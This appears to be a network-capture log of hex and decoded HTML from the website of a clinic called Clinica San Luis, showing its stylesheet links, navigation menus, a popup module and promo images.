                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7864INData Raw: 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c
                                                                                                                                                                                                                                                                          Data Ascii: x/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/users/nucl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7866INData Raw: 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62
                                                                                                                                                                                                                                                                          Data Ascii: a4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokb
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7883INData Raw: 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d
                                                                                                                                                                                                                                                                          Data Ascii: js"></script> <link rel="stylesheet" href="/media/gantry5/users/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7884INData Raw: 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65
                                                                                                                                                                                                                                                                          Data Ascii: alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-me
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7886INData Raw: 72 65 6e 74 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69
                                                                                                                                                                                                                                                                          Data Ascii: rent><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-content"><span class="g-menu-i
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7887INData Raw: 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61
                                                                                                                                                                                                                                                                          Data Ascii: -item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent> <span class="g-sepa
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7984INData Raw: 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76
                                                                                                                                                                                                                                                                          Data Ascii: pan class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/v
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7986INData Raw: 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                          Data Ascii: nica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8003INData Raw: 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e
                                                                                                                                                                                                                                                                          Data Ascii: m-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8004INData Raw: 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61
                                                                                                                                                                                                                                                                          Data Ascii: n></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></spa
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8102INData Raw: 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73
                                                                                                                                                                                                                                                                          Data Ascii: span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></s
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8103INData Raw: 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75
                                                                                                                                                                                                                                                                          Data Ascii: nent g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8120INData Raw: 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                                                                                                                                                                                                                                          Data Ascii: v class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 25
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8202INData Raw: 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e
                                                                                                                                                                                                                                                                          Data Ascii: closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafan
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8203INData Raw: 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d
                                                                                                                                                                                                                                                                          Data Ascii: document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8220INData Raw: 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 22 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 69 74 61 2d 6d 65 64
                                                                                                                                                                                                                                                                          Data Ascii: bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-button"><a href="/index.php/contacto/cita-med
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8222INData Raw: 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 33 20 67 2d 61 6e 69 6d 61
                                                                                                                                                                                                                                                                          Data Ascii: alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg-3 g-anima
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8223INData Raw: 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69
                                                                                                                                                                                                                                                                          Data Ascii: v class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block si
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8224INData Raw: 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3e 0a 3c 64 69 76 20
                                                                                                                                                                                                                                                                          Data Ascii: -block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt><div
